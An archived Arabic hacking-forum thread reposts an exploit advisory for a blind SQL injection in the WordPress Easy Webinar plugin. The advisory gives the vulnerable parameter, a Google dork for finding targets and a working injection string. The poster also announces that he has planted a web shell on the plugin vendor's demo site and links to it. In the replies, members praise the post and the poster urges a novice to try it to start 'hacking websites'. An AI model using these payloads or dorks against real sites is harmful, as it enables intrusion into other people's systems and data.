development-point

development-point (https://vb.development-point.com/index.php)
-   قسم الثغـرات (https://vb.development-point.com/forumdisplay.php?f=64)
-   -   Wordpress Easy Webinar Plugin Blind SQL (https://vb.development-point.com/showthread.php?t=4739)

Mr iNFiNiTi 11-29-2012 06:37 PM
Wordpress Easy Webinar Plugin Blind SQL
 
كود:
# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability
# Vendor Homepage: www.easywebinarplugin.com
 
# Date: 10/26/2012
 
# Author: Robert Cooper (robert.cooper [at] areyousecure.net)
 
# Tested on: [Linux/Windows 7]
 
#Vulnerable Parameters: wid=
 
 
# Google Dork: allinurl: get-widget.php?wid=
 
##############################################################
Exploit:
 
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi]
 
Note: The HTTP response will read 404, but this is false:
 
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x
 
This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).
##############################################################
 
www.areyousecure.net
 
# Shouts to the Belegit crew

شل على موقع الاضافة من رفعي :SnipeR (29):

http://demo.easywebinarplugin.com/wp...n/webadmin.php

DHooMi1000 11-29-2012 06:59 PM
رد: Wordpress Easy Webinar Plugin Blind SQL
 
مآشآء آلله

آبدآع والله

الله يعطيك الف الف الف عافيهه آإخخوي =) ...


تقبل مروريَ يَ بطلَ =) ...

Mr iNFiNiTi 11-29-2012 07:12 PM
رد: Wordpress Easy Webinar Plugin Blind SQL
 
^^
الله يحييك قسم بالله منور الموضوع

SnipeR 11-29-2012 07:33 PM
رد: Wordpress Easy Webinar Plugin Blind SQL
 
بارك الله فيك
شكرا لك
:)

yousif zozo 11-29-2012 11:58 PM
رد: Wordpress Easy Webinar Plugin Blind SQL
 
ماشاء الله

ثغرة جميلة انشالله تتم الاستفادة منها مع اني ليس لي خبرة كبيرة في المواقع :SnipeR (69):

Mr iNFiNiTi 11-30-2012 03:03 AM
رد: Wordpress Easy Webinar Plugin Blind SQL
 
حاول تطبيقها انشاء الله راح تدخل عالم اختراق المواقع
الله يعطيكم العافيه على المرور كلياتكن

slo00om 12-03-2012 08:50 PM
رد: Wordpress Easy Webinar Plugin Blind SQL
 
الله يعطيك الف عافية مع اني ما اعرف اخترق مواقع :SnipeR (60):
تسسلم
ان شا الله اتعلم


الساعة الآن 12:53 PM

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47